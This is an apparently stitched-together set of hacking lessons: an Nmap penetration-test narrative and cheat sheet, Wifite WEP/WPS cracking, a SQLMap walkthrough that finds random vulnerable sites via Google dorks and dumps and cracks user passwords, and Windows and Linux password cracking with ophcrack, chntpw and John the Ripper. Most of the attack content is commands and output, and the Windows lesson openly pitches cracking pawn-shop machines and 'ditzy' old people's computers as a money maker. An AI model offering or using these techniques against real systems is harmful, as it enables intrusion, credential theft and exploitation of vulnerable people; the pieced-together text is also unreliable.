6.207.0.0/22. Felix checks the IP whois records anyway and confirms that these IP ranges are allocated to AO[1]. Felix subconsciously decodes the CIDR notation[2] and recognizes this as 1,280 IP addresses. No problem. Being the careful type, Felix first starts out with what is known as an Nmap list scan (-sL option). This feature simply enumerates every IP address in the given target netblock(s) and does a reverse-DNS lookup (unless - n was specified) on each. One reason to do this first is stealth. The names of the hosts can hint at potential vulnerabilities and allow for a better understanding of the target network, all without raising alarm bells[3]. Felix is doing this for another reason—to double-check that the IP ranges are correct. The systems administrator who provided the IPs might have made a mistake, and scanning the wrong company would be a disaster. The contract signed with Avatar Online may act as a get-out-of-jail-free card for penetrating their networks, but will not help if Felix accidentally compromises another company's server! The command he uses and an excerpt of the results are shown in Example 1.1 felix> nmap -sL 6.209.24.0/24 6.207.0.0/22 Starting Nmap ( http://nmap.org ) Nmap scan report for 6.209.24.0 Nmap scan report for fw.corp.avataronline.com (6.209.24.1) Nmap scan report for dev2.corp.avataronline.com (6.209.24.2) Nmap scan report for 6.209.24.3 Nmap scan report for 6.209.24.4 ... Nmap scan report for dhcp-21.corp.avataronline.com (6.209.24.21) Nmap scan report for dhcp-22.corp.avataronline.com (6.209.24.22) Nmap scan report for dhcp-23.corp.avataronline.com (6.209.24.23) ... Nmap scan report for 6.207.0.0 Nmap scan report for gw.avataronline.com (6.207.0.1) Nmap scan report for ns1.avataronline.com (6.207.0.2) Nmap scan report for ns2.avataronline.com (6.207.0.3) Nmap scan report for ftp.avataronline.com (6.207.0.4) Nmap scan report for 6.207.0.5 Nmap scan report for 6.207.0.6 Nmap scan report for www.avataronline.com (6.207.0.7) Nmap scan report for 6.207.0.8 ... Nmap scan report for cluster-c120.avataronline.com (6.207.2.120) Nmap scan report for cluster-c121.avataronline.com (6.207.2.121) Nmap scan report for cluster-c122.avataronline.com (6.207.2.122) ... Nmap scan report for 6.207.3.255 Nmap done: 1280 IP addresses (0 hosts up) scanned in 331.49 seconds felix> Reading over the results, Felix finds that all of the machines with reverse-DNS entries resolve to Avatar Online. No other businesses seem to share the IP space. Moreover, these results give Felix a rough idea of how many machines are in use and a good idea of what many are used for. He is now ready to get a bit more intrusive and try a port scan. He uses Nmap features that try to determine the application and version number of each service listening on the network. He also requests that Nmap try to guess the remote operating system via a series of low-level TCP/IP probes known as OS fingerprinting. This sort of scan is not at all stealthy, but that does not concern Felix. He is interested in whether the administrators of AO even notice these blatant scans. After a bit of consideration, Felix settles on the following command: nmap -sS -p- -PE -PP -PS80,443 -PA3389 -PU40125 -A -T4 -oA avatartcpscan- %D 6.209.24.0/24 6.207.0.0/22 Intro – Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. It uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. While Network Mapper is commonly used for security audits, many systems and network administrators find it useful for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. 1. How to open nmap A. GUI method Application → Kali Linux → Information gathering → DNS Analysis → nmap B. open terminal type nmap hit enter 2. Scan a single IP address When firewall OFF/ON on target PC Syntax – nmap IP address/hostname EX – nmap 192.168.75.131 Ex- nmap google.com 3. Boost up Your nmap Scan – using this command u can decrease scan time Syntax – nmap –F IP address Ex – nmap –F google.com 4. Scan multiple IP address or subnet A. scan a range of IP address Syntax – nmap IP address range EX- nmap 192.168.75.1-131 B. Scan a range of IP address using a wildcard Ex – nmap 192.168.75.* C. Scan an entire subnet Ex – nmap 192.168.75.1/24 5. scan turn on OS and version detection Ex – nmap –O 192.168.75.131 6. Scan all TCP port in target IP Ex – nmap –sT 192.168.75.131 7. Scan a firewall for security weakness A. Null scan – TCP Null Scan to fool a firewall to generate a response Ex – nmap –sN 192.168.75.131 B. Fin scan – TCP Fin scan to check firewall Ex – nmap –sF 192.168.75.131 C. TCP Xmas scan to check firewall Ex – nmap –sX 192.168.75.131 8. UDP Scan – Scan a host for UDP services. This scan is used to view open UDP port. Ex – nmap –sU 192.168.75.131 9. Scan for IP protocol – This type of scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines. Ex – nmap –sO 192.168.75.131 10. detect remote services (server / daemon) version numbers Ex – nmap –sV 192.168.75.131 11. Find out the most commonly used TCP ports using TCP SYN Scan A. Stealthy scan Ex – nmap –sS 192.168.75.131 B. Find out the most commonly used TCP ports using TCP connect scan Ex – nmap –sT 192.168.75.131 C. Find out the most commonly used TCP ports using TCP ACK scan Ex – nmap –sA 192.168.75.131 D. Find out the most commonly used TCP ports using TCP Windowscan Ex – nmap –sW 192.168.75.131 E. Find out the most commonly used TCP ports using TCP Maimon scan Ex – nmap – sM 192.168.75.131 12. List Scan – this command is used tolist target to scan Ex – nmap –sL 192.168.75.131 13. Host Discovery or Ping Scan – Scan a network and find out which servers and devices are up and running Ex – nmap –sP 192.168.75.0/24 14. Scan a host when protected by the firewall Ex – nmap –PN 192.168.75.1 Lesson 6: Wifi Hacking the easy way: Using WIFITE Wifite While the aircrack-ng suite is a well known name in the wireless hacking , the same can't be said about Wifite. Living in the shade of the greatness of established aircrack-ng suite, Wifite has finally made a mark in a field where aircrack-ng failed. It made wifi hacking everyone's piece of cake. While all its features are not independent (eg. it hacks WPS using Reaver), it does what it promises, and puts hacking on autopilot. I'm listing some features, before I tell you how to use wifite (which I don't think is necessary at all, as anyone who can understand simple English instructions given by Wifite can use it on his own). Features Of Wifite Sorts targets by signal strength (in dB); cracks closest access points first Automatically de-authenticates clients of hidden networks to reveal SSIDs Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc) Customizable settings (timeouts, packets/sec, etc)" Anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete All captured WPA handshakes are backed up to wifite.py's current directory Smart WPA de-authentication; cycles between all clients and broadcast deauths Stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit Displays session summary at exit; shows any cracked keys All passwords saved to cracked.txt Built-in updater: ./wifite.py -upgrade I find it worth mentioning here, that not only does it hack wifi the easy way, it also hack in the best possible way. For example, when you are hacking a WEP wifi using Wifite, it uses fakeauth and uses the ARP Method to speed up data packets. Hacking WEP network wifite -wep You might even have used the command wifite The -wep makes it clear to wifite that you want to hack WEP wifis only. It'll scan the networks for you, and when you think it has scanned enough, you can tell it to stop by typing ctrl+c. It'll then ask you which wifi to hack. In my case, I didn't specify -wep so it shows all the wifis in range. You can also select all and then go take a nap (or maybe go to sleep). When you wake up, you might be hacking all the wifi passwords in front of you. I typed one and it had gathered 7000 IVs (data packets) within 5 mins. Basically you can except it to hack the wifi in 10 mins approx. Notice how it automatically did the fake auth and ARP replay. Here are a few more screenshots of the working of Wifite, from their official website (./wifite.py is not something that should bother you. You can stick with the simple wifite. Also, specifying the channel is optional so even the -c 6 was unnecessary. Notice that instead of ARP replay, the fragmentation attack was used, using -frag) Hacking WPS wasn't fast (it took hours), but it was easy and didn't require you to do anything but wait. However, Wifite makes it possible for you to use any method that you want to use, by just naming it. As you saw in the screenshot above, the fragmentation attack was carried out just by typing -frag. Similarly, many other attacks can be played with. A good idea would be to execute the following- wifite -help This will tell you about the common usage commands, which will be very useful. Here is the list of WEP commands for different attacks- WEP -wep only target WEP networks [off] -pps <num> set the number of packets per second to inject [600] -wept <sec> sec to wait for each attack, 0 implies endless [600] -chopchop use chopchop attack [on] -arpreplay use arpreplay attack [on] -fragment use fragmentation attack [on] -caffelatte use caffe-latte attack [on] -p0841 use -p0841 attack [on] -hirte use hirte (cfrag) attack [on] -nofakeauth stop attack if fake authentication fails [off] -wepca <n> start cracking when number of ivs surpass n [10000] -wepsave save a copy of .cap files to this directory [off] Troubleshooting Wifite quits unexpectedly, sating "Scanning for wireless devices. No wireless interfaces were found. You need to plug in a wifi device or install drivers. Quitting." You are using Kali inside a virtual machine most probably. Virtual machine does not support internal wireless card. Either buy an external wireless card, or do a live boot / side boot with Windows. Anything other than Virtual machine in general. Lesson 7: Sql Injection using SQLMap Disclaimer: using this program on any website without permission is illegal. By reading and/or utilizing this tutorial you accept sole responsibility for your actions and release Opsec Cybersecurity Solutions LLC and its employees from any legal liability for your actions. Sql injection is a way of extracting user login info and other data from unsecure sql databases on companies servers. It is one of the most common ways sites are hacked. What is SQLMAP sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. Features Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band. Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns. Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry. Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command. [Source: www.sqlmap.org] Step 1: Find a Vulnerable Website This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google Dorks knows this already, but in case you don’t I have put together a number of strings that you can search in Google. Just copy paste any of the lines in Google and Google will show you a number of search results. Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website You can google a list of google dork strings Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection For every google dork string, you will get huundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive. Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this: http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 Just add a single quotation mark ' at the end of the URL. (Just to ensure, " is a double quotation mark and ' is a single quotation mark). So now your URL will become like this: http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15' If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to a different page, move on to the next site in your Google search results page. See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons. Examples of SQLi Errors from Different Databases and Languages Microsoft SQL Server Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’. Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code. Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’. MySQL Errors Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12 Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12 Oracle Errors java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208) Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated PostgreSQL Errors Query failed: ERROR: unterminated quoted string at or near “‘’’” Step 2: List DBMS databases using SQLMAP SQL Injection As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable. Run the following command on your vulnerable website with. sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs In here: sqlmap = Name of sqlmap binary file -u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15″) --dbs = Enumerate DBMS databases This commands reveals quite a few interesting info: web application technology: Apache back-end DBMS: MySQL 5.0 [10:55:53] [INFO] retrieved: information_schema [10:55:56] [INFO] retrieved: sqldummywebsite [10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com' So, we now have two database that we can look into. information_schema is a standard database for almost every MYSQL database. So our interest would be on sqldummywebsitedatabase. Step 3: List tables of target database using SQLMAP SQL Injection Now we need to know how many tables this sqldummywebsite database got and what are their names. To find out that information, use the following command: sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables Sweet, this database got 8 tables. [10:56:20] [INFO] fetching tables for database: 'sqldummywebsite' [10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2' [10:56:22] [INFO] the SQL query used returns 8 entries [10:56:25] [INFO] retrieved: item [10:56:27] [INFO] retrieved: link [10:56:30] [INFO] retrieved: other [10:56:32] [INFO] retrieved: picture [10:56:34] [INFO] retrieved: picture_tag [10:56:37] [INFO] retrieved: popular_picture [10:56:39] [INFO] retrieved: popular_tag [10:56:42] [INFO] retrieved: user_info and of course we want to check whats inside user_info table using SQLMAP SQL Injection as that table probably contains username and passwords. Step 4: List columns on target table of selected database using SQLMAP SQL Injection Now we need to list all the columns on target table user_info of sqldummywebsitedatabase using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command: sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -- columns This returns 5 entries from target table user_info of sqldummywebsite database. [10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite' [10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2' [10:57:18] [INFO] the SQL query used returns 5 entries [10:57:20] [INFO] retrieved: user_id [10:57:22] [INFO] retrieved: int(10) unsigned [10:57:25] [INFO] retrieved: user_login [10:57:27] [INFO] retrieved: varchar(45) [10:57:32] [INFO] retrieved: user_password [10:57:34] [INFO] retrieved: varchar(255) [10:57:37] [INFO] retrieved: unique_id [10:57:39] [INFO] retrieved: varchar(255) [10:57:41] [INFO] retrieved: record_status [10:57:43] [INFO] retrieved: tinyint(4) AHA! This is exactly what we are looking for … target table user_login and user_password. Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection SQLMAP SQL Injection makes is Easy! Just run the following command again: sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump Guess what, we now have the username from the database: [10:58:39] [INFO] retrieved: userX [10:58:40] [INFO] analyzing table dump for possible password hashes Almost there, we now only need the password to for this user.. Next shows just that.. Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to extract password for the user. sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump TADA!! We have password. [10:59:15] [INFO] the SQL query used returns 1 entries [10:59:17] [INFO] retrieved: 24iYBc17xK0e. [10:59:18] [INFO] analyzing table dump for possible password hashes Database: sqldummywebsite Table: user_info [1 entry] +---------------+ | user_password | +---------------+ | 24iYBc17xK0e. | +---------------+ But hang on, this password looks funny. This can’t be someone’s password.. Someone who leaves their website vulnerable like that just can’t have a password like that. That is exactly right.This is a hashed password. What that means, the password is encrypted and now we need to decrypt it Step 7: Cracking password So the hashed password is 24iYBc17xK0e. . How do you know what type of hash is that? Step 7.a: Identify Hash type Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value: hash-identifier Excellent. So this is DES(Unix) hash. Step 7.b: Crack HASH using cudahashcat First of all I need to know which code to use for DES hashes. So let’s check that: cudahashcat --help | grep DES So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500. I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in Hard Disk. Instructions are in the website, search around. I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running: cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. (not in it’s help menu). However both cudaHashcat and oclHashcat found and cracked the key. Anyhow, so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123 Sweet, we now even have the password for this user. Lesson 8: Cracking Windows Passwords in Kali Linux This is probably your number one money maker. Pawn shops whos computer forfeited out and need to be sold, to citizens and old people who are just ditzy. Enjoy. Crack and Reset the system password locally using Kali Insert the USB Live CD and Boot your PC. Make sure the Boot from USB is the first option in the Boot menu at BIOS. Boot Windows machine with the LiveCD. On the boot menu of Kali Linux, select Live (forensic mode). Kali Linux initialize and when it loads, it will open a terminal window and navigate to the Windows password database file Crack the Windows password with ophcrack: After loading Live kali linux go to the system menu > ophcrack click ok Ophcrack uses Rainbow Tables to crack NTLM and LM hashes into plain text, its a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. If you have a complex password it will take a lot longer than simple passwords, and with the free tables your password may never be cracked. Once the crack is done you will see the password in plain text, write it down and reboot the machine to login. If your password isn’t cracked, you can also log in as one of the other users with admin rights and then change your password from within Windows. With the free tables available you will not be able to crack every password, but the paid tables range from $100 to $1000.Windows uses NTLM hashes to encrypt the password file which gets stored in SAM file. We simply need to target this file to retrieve the password Now you can see the ophcrack application windows. Here, click on Load > Encrypted SAM After that we need to give the path to SAM directory which is by default /mnt/hda1/WINDOWS/System32 click choose Here we can see the saved hashed now with the username and userid. Now click on Crack button and wait for the password. Its quick and easy That’s it. It’ll show the password , if you unsuccessfully go with free tables. I downloaded the xp free small and the Vista free tables. Once you have downloaded the tables you will need to unzip them in separate folders. I made a folder called “hash-tables” and then made 2 more folders within for each table to unzip to. Run the program and click on “Tables” button. Select the table you downloaded and click “Install”, navigate to the folder where you unzipped the table, select it and then click “ok.” You should see green lights next to the tables you installed. Reset Windows password with chntpw: Navigate to the Windows password database file. Almost all versions of windows password is saved in SAM file. This file is usually located under /Windows/System32/config. On your system it may look something like this: /media/hda1/Windows/System32/config. The SAM database is usually in the /media/name_of_hard_drive/Windows/System32/config Type command chntpw -l SAM and it will list out all the usernames that are contained on the Windows system. #chntpw -l SAM The command gives us a list of usernames on the system. When we have the username we want to modify and we simply run the command chntpw -u “username” SAM In the example below we typed: chntpw -u “Sanjai sathish” SAM and we get the following menu: #chntpw -u Sanjai sathish We now have the option of clearing the password, changing the password, or promoting the user to administrator. Changing the password does not always work on Windows 7,8 systems. it may works on XP system, so it is recommended to clear the password. Therefore you will be able to log in with a blank password. You can also promote the user to a local administrator as well. Crack the password in Linux using John the ripper: John the Ripper is a fast password cracker, Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version John the ripper is a popular dictionary based password cracking tool. It uses a wordlist full of passwords and then tries to crack a given password hash using each of the password from the wordlist. In other words its called brute force password cracking and is the most basic form of password cracking. It is also the most time and cpu consuming technique. More the passwords to try, more the time required. But still if you want to crack a password locally on your system then john is one of the good tools to try. John is in the top 10 security tools in Kali linux. In this topic i am going to show you, how to use the unshadow command along with john to crack the password of users on a linux system. On linux the username/password details are stored in the following 2 files #/etc/passwd #/etc/shadow The actual password hash is stored in /etc/shadow and this file is accessible on with root access to the machine. So try to get this file from your own linux system. Or first create a new user with a simple password. I will create a new user on my linux system named happy, with password chess. Now that our new user is already created its time to crack his password. #unshadow The unshadow command will basically combine the data of /etc/passwd and /etc/shadow to create 1 file with username and password details. Usage is quite simple. #unshadow /etc/passwd /etc/shadow > ~/crack We redirected the output of unshadow command to a new file called crack. Now this new file shall be cracked by john. For the wordlist we shall be using the password list that comes with john on kali linux. It is located at the following path /usr/share/john/password.lst or you can use your own password lists too. #john –wordlist=/usr/share/john/password.lst ~/crack Use the “–show” option to display all of the cracked passwords reliably
Compartilhar